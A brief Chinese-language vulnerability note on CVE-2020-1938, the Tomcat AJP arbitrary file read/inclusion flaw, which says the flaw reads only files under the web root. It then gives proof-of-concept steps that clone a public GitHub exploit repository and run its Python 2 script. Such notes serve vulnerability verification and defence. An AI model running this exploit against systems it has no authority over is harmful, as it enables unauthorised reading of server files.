本页总览CVE-2020-1938 、tomcat AJP 任意文件读取/包含漏洞只能读网站根目录下的文件POC这里利用github中的一个项目进行验证git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi cd CNVD-2020-10487-Tomcat-Ajp-lfi python CNVD-2020-10487-Tomcat-Ajp-lfi.py #py2环境